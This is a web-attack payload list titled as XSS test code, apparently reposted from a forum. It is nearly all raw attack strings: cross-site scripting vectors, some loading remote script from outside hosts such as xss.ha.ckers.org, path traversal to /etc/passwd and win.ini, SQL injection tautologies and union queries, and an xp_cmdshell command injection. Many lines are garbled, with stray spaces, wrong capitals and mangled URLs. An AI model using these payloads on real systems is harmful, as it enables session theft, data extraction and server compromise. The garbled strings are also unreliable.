XSS Cross-site test code Daquan

Forum Address Http://bbs.quseo.net

' ><script>alert (document.cookie) </script>

= ' ><script>alert (document.cookie) </script>
<script>alert (Document.cookie) </script>
<script>alert (Vulnerable) </script>
%3cscript%3ealert (' XSS ')%3c/script%3e
<script>alert (' XSS ') </script>

%0a%0a<script>alert (\ "Vulnerable\") </script>.jsp
%22%3cscript%3ealert (%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
%3c/a%3e%3cscript%3ealert (%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert (%22xss%22)%3c/script%3e
%3cscript%3ealert (%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert (' vulnerable ');</script>
<script>alert (' vulnerable ') </script>
? sql_debug=1
A%5c.aspx
A.jsp/<script>alert (' vulnerable ') </script>
A/
A?<script>alert (' vulnerable ') </script>
"><script>alert (' vulnerable ') </script>
'; Exec%20master. Xp_cmdshell%20 ' dir%20 c:%20>%20c:\inetpub\wwwroot\? TXT '--&&
%22%3e%3cscript%3ealert (Document.cookie)%3c/script%3e
%3cscript%3ealert (document. domain);%3c/script%3e&
%3cscript%3ealert (document.domain);%3c/script%3e&session_id={session_id}&session_id=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
.. \.. \.. \.. \.. \.. \.. \.. \windows\system.ini
\.. \.. \.. \.. \.. \.. \.. \.. \windows\system.ini
‘‘;! --"<xss>=&{()}










" Out

<script>a=/xss/alert (A.source) </SCRIPT>
<body background= "Javascript:alert (' XSS ')" >
<body onload=alert (' XSS ') >


<bgsound src= "Javascript:alert (' XSS '); >
<br size= "&{alert (' XSS ')}" >
<layer src= "Http://xss.ha.ckers.org/a.js" ></layer>
<link rel= "stylesheet" href= "Javascript:alert (' XSS ');" >



<meta http-equiv= "Refresh" content= "0;url=javascript:alert (' XSS ');" >
<iframe src=javascript:alert (' XSS ') ></IFRAME>
<frameset><frame src=javascript:alert (' XSS ') ></FRAME></FRAMESET>
<table background= "Javascript:alert (' XSS ')" >
<div style= "Background-image:url (Javascript:alert (' XSS ')") >
<div style= "Behaviour:url (' http://www.how-to-hack.org/exploit.html ');" >
<div style= "width:expression (Alert (' XSS ')); >
<STYLE> @im \port ' \ja\vasc\ript:alert ("XSS") ';</style>

<style type= "Text/javascript" >alert (' XSS ');</style>
<style type= "Text/css";. Xss{background-image:url ("Javascript:alert (' XSS ')");} </style><a class= "XSS" ></A>
<style type= "Text/css" >body{background:url ("Javascript:alert (' XSS ')")}</style>
<base href= "Javascript:alert (' XSS ');//" >
GetURL ("Javascript:alert (' XSS ')")
A= "Get"; b= "URL"; c= "javascript:";d = "alert (' XSS ');"; eval (a+b+c+d);
<xml src= "Javascript:alert (' XSS '); >
"> <body onload=" A (); " ><script>function A () {alert (' XSS ');} </SCRIPT>< "
<script src= "Http://xss.ha.ckers.org/xss.jpg" ></SCRIPT>
<!--#exec cmd= "/bin/echo ' <script SRC '"--><!--#exec cmd= "/bin/echo" =http://xss.ha.ckers.org/a.js> </SCRIPT> ' "-

<script a= ">" src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<script = ">" src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<script a= ">" src= "http://xss.ha.ckers.org/a.js" ></SCRIPT>
<script "a= ' > '" src= "Http://xss.ha.ckers.org/a.js" ></SCRIPT>
<script>document.write ("<scri"); </script>pt src= "Http://xss.ha.ckers.org/a.js" ></script >
<a href=http://www.gohttp://www.google.com/ogle.com/>link</a>
Admin '--
' Or 0=0--
"Or 0=0--
or 0=0--
' Or 0=0 #
"Or 0=0 #
or 0=0 #
' or ' x ' = ' x
"or" x "=" x
') or (' x ' = ' x
' Or 1=1--
"Or 1=1--
or 1=1--
' Or a=a--
"or" a "=" a
') or (' a ' = ' a
") or (" a "=" a
Hi "or" a "=" a
Hi "or 1=1--
Hi ' or 1=1--
Hi ' or ' a ' = ' a
Hi ') or (' a ' = ' a
Hi ") or (" a "=" A[/code ")

XSS Cross-site test code Daquan